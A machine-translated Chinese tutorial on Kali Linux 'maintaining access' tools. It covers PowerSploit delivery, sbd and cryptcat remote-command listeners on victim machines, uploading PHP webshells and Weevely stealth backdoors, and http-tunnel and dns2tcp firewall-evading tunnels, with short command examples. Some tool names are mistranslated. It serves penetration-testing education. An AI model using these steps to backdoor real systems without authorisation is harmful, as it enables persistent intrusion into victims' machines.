Kali Linux – 维护访问

Kali Linux – 维护访问


在本章中,我们将看到 Kali 用来维持连接和访问被黑机器的工具,即使它再次连接和断开连接。

强盗

这是一个适用于 Windows 机器的工具。它在受害者机器上安装了 PowerShell。该工具可帮助黑客通过 PowerShell 连接到受害者的机器。

要打开它,请打开左侧的终端并输入以下命令进入 powersploit 文件夹 –

cd /usr/share/powersploit/ 

如果您键入“ls”,它将列出您获得访问权限后可以下载并安装在受害者机器中的所有 powersploit 工具。他们中的大多数都是根据他们的名字不言自明的名字。

强盗

在受害者的机器上下载此工具的一种简单方法是创建一个 Web 服务器,powersploit 工具允许使用以下命令轻松创建该服务器 –

python -m SimpleHTTPServer 

下载工具

在此之后,如果您输入: http://<Kali machine ip_address>:8000/ 以下是结果。

目录列表

单板

sbd 是一个类似于 Netcat 的工具。它是可移植的,可以在 Linux 和 Microsoft 机器上使用。sbd 具有 AES-CBC-128 + HMAC-SHA1 加密>基本上,它有助于随时在特定端口上连接到受害者的机器并远程发送命令。

要打开它,请转到终端并键入“sbd -l -p port”让服务器接受连接。

连接接受

在这种情况下,让我们将端口 44 放在服务器将侦听的位置。

箱口

在受害者的站点上,输入“sbd IPofserver port”将建立一个连接,我们可以在其中发送远程命令。

在这种情况下,它是“localhost”,因为我们在同一台机器上执行了测试。

服务器

最后,在服务器上,您将看到已发生连接,如下面的屏幕截图所示。

服务器连接

网壳

Webshel​​l 可用于维护访问或入侵网站。但其中大部分都被防病毒软件检测到。C99 php shell 在防病毒软件中非常有名。任何常见的防病毒软件都可以轻松将其检测为恶意软件。

通常,它们的主要功能是通过 Web 界面发送系统命令。

打开它,在终端中输入“cd /usr/share/webshel​​ls/”

网壳

如您所见,它们根据编程语言分为几类:asp、aspx、cfm、jsp、perl、php

进入php文件夹,可以看到php网页的所有webshel​​l。

文件夹

要将 shell 上传到 Web 服务器,例如“simple-backdoor.php”,请打开 Web shell 的网页和 URL。

最后写cmd命令。您将拥有以下屏幕截图中显示的所有信息。

写命令

威威利

Weevely 是一个模拟 telnet 式连接的 PHP web shell。它是一种用于 Web 应用程序后期利用的工具,可用作隐形后门或用作管理合法 Web 帐户(甚至是免费托管帐户)的 Web shell。

要打开它,请转到终端并输入“weevely”,您可以在其中查看其用法。

威威利

要生成 shell,请输入“weevely generate password pathfile”如以下屏幕截图所示,它是在“桌面”文件夹中生成的,该文件将上传到网络服务器以获取访问权限。

生成外壳

如下图所示上传 web shell 后,我们可以使用 cmd 使用命令“weevely URL password”连接到服务器,您可以在其中看到会话已启动。

上传文件

http-隧道

http-tunnel 创建在 HTTP 请求中建立隧道的双向虚拟数据流。如果需要,可以通过 HTTP 代理发送请求。这对于受限制性防火墙保护的用户非常有用。如果允许通过 HTTP 代理访问 WWW,则可以使用 http-tunnel 和 telnet 或 PPP 连接到防火墙外的计算机。

首先,我们应该使用以下命令创建一个隧道服务器 –

httptunnel_server –h 

然后,在客户端站点上键入“httptunnel_client –h”,两者都将开始接受连接。

dns2tcp

这又是一个隧道工具,有助于通过 DNS 流量(即 UDP 53 端口)传递 TCP 流量。

要启动它,请输入“dns2tcpd”打开脚本时会解释用法。

DNSTcp

在服务器站点上,输入此命令以配置文件。

#cat >>.dns2tcpdrc
<&lEND listen = 0.0.0.0 
port = 53 user=nobody 
chroot = /root/dns2tcp 
pid_file = /var/run/dns2tcp.pid 
domain = your domain key = secretkey 
resources = ssh:127.0.0.1:22 
END 
#dns2tcpd -f .dns2tcpdrc

在客户端站点上,输入此命令。

# cat >>.dns2tcprc 
<<END domain = your domain 
resource = ssh 
local_port = 7891 
key = secretkey 
END
# dns2tcpc -f .dns2tcprc 
# ssh root@localhost -p 7891 -D 7076 

隧道将从这个命令开始。

加密猫

它是另一种类似于 Netcat 的工具,它允许以加密方式与受害者的机器建立 TCP 和 UDP 连接。

要启动服务器以侦听连接,请键入以下命令 –

cryptcat –l –p port –n 

加密猫

在哪里,

  • -l代表监听连接

  • -p代表端口号参数

  • -n代表不做名称解析

在客户端,连接命令是“cryptcat IPofServer PortofServer”

服务器端口

觉得文章有用?

点个广告表达一下你的爱意吧 !😁